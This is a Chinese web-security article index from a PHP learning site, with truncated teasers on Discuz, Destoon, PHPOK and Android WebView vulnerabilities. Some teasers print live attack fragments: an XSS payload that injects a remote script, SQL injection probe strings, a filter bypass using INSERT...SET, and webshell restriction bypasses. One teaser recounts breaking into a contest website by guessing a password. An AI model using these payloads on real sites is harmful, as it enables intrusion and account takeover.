浅谈如何保证discuz插件安全 - 网站安全 - 自学p关注热度:20
1 非直接执行程序请加上if(!defined( IN_DISCUZ )) {exit( Access Denied );}2 记得过滤 比如说uid等id需要intval过滤,避免溢出 文字内容需要htmlspecialchars过滤避免内容变形(DZ内为dhtmlspecialc..[详情]
destoon新版短消息中心xss指谁打谁 - 网站安全 - 自关注热度:35
首先选取一个对象我们去发消息然后抓包,往里面填充我们的xss代码其中的xssimg src=x onerror=s=createElement( 39;script 39;);body appendChild(s);s src= 39;xsscode 39;;然后我们来试着点开该信息,..[详情]
UC浏览器HD版本远程代码执行漏洞 - 网站安全 - 自关注热度:29
浏览器来说这种问题还是需要修补的导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4 0手机上测试实际存在,4 2以上版本不存在function execute(cmdArgs){return searchBoxJavaBridge_ get..[详情]
Android WebView的Js对象注入漏洞解决方案 - 网站安关注热度:72
目录1使用场景2漏洞描述3漏洞证明4解决方案5一些思考最近在做一个项目过程中,发现了一个很严重的安全漏洞,这个漏洞是乌云平台报告出来的。1,使用场景我们很多时候要使用WebV..[详情]
Webshell下命令执行限制及绕过方法 - 网站安全 -关注热度:25
0times;00前言上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御 0times;01 php webshell执行命令原理php webshell(以..[详情]
Mysql语法绕过360scan insert防注入 - 网站安全 - 自学关注热度:52
360scan正则:INSERT s+INTO +?VALUES其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx =提交:1http: localhost 360 php?sql=insert into user (user,pass)..[详情]
SQL注入测试用例 - 网站安全 - 自学php关注热度:72
看看是什么权限的and 1=(Select IS_MEMBER( db_owner ))And char(124)%2BCast(IS_MEMBER( db_owner ) as varchar(1))%2Bchar(124)=1 ;-- 检测是否有读取某数据库的权限and 1= (Select HAS_DBACC..[详情]
PHPOK#XSS利用突破到GetShell第一发 - 网站安全 - 自学关注热度:22
数据库对存入进行过滤,但是取出来的时候,仍然可利用XSS完成GetShell 在线留言功能里面留言主题在存入数据的时候都进行了过滤数据库内容数据库的字段长度为255,可以写任何的数据..[详情]
Discuz某处XSS劫持UC_KEY(XSS应用详细过程) - 网站关注热度:26
Discuz某处XSS劫持UC_KEY到拿webshell。XSS应用的详细过程。漏洞:这个漏洞的位置在Discuz的门户功能处。在发表文章时,打开编辑源码功能时,写入任意XSS CODE后,再进入和输出都没有过滤。..[详情]
discuz x3.0 20130801版本发表日志可xss(含修复) - 网站关注热度:34
论坛开启日志功能的情况下,发表日志,在引入网络图片时可以实现xss。一、详细说明:1、论坛开启日志功能。2、用户登录后打开日志功能。3、发表日志,在引入网络图片时可以实现..[详情]
ThinkPHP3.1 安全快速入门 - 网站安全 - 自学php关注热度:32
对于WEB应用来说,SQL注入攻击无疑是首要防范的安全问题,系统底层对于数据安全方面本身进行了很多的处理和相应的防范机制,例如: $U..[详情]
打掉安卓手机木马的老窝 - 网站安全 - 自学php关注热度:27
今天在群里面有人发了个安卓手机短信拦截的木马给我。问我需不需要购买。于是骗来测试。。首先逆向之,发现了个URL,于是渗透开始这个是首页 伪装成一个傻逼站点我们继续看 通过..[详情]
Discuz! X 某 XSS - 网站安全 - 自学php关注热度:41
Self XSS + Click Jacking == 存储型 XSShttp: hi baidu com hacklele admin php?frames=yesaction=moderateoperation=threads,页面内有个隐藏表单title,可以GET 提交,管理点击『提交』后触发。由..[详情]
看我如何拿下百度杯 - 网站安全 - 自学php关注热度:37
好吧,我说的是拿下百度杯的网站。查看了下bctf cn域名邮箱是bctf2013@163 com找回密码问题没有设置,应该是新创建的,安全意识肯定不好于是乎组合密码www bctf cn bctf2013 bctf2014 bctf cn密码..[详情]
Discuz! X3.1 刷分系列漏洞 - 网站安全 - 自学php关注热度:38
Discuz!X最新版本(及部分旧版本所存在的刷分漏洞)今天论坛有个用户积分突然涨了特别多,一查日志,发现是以前在旧版发现的一个刷分洞。原本以为早就修复了,没想到还存在,那就..[详情]
站长推荐
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com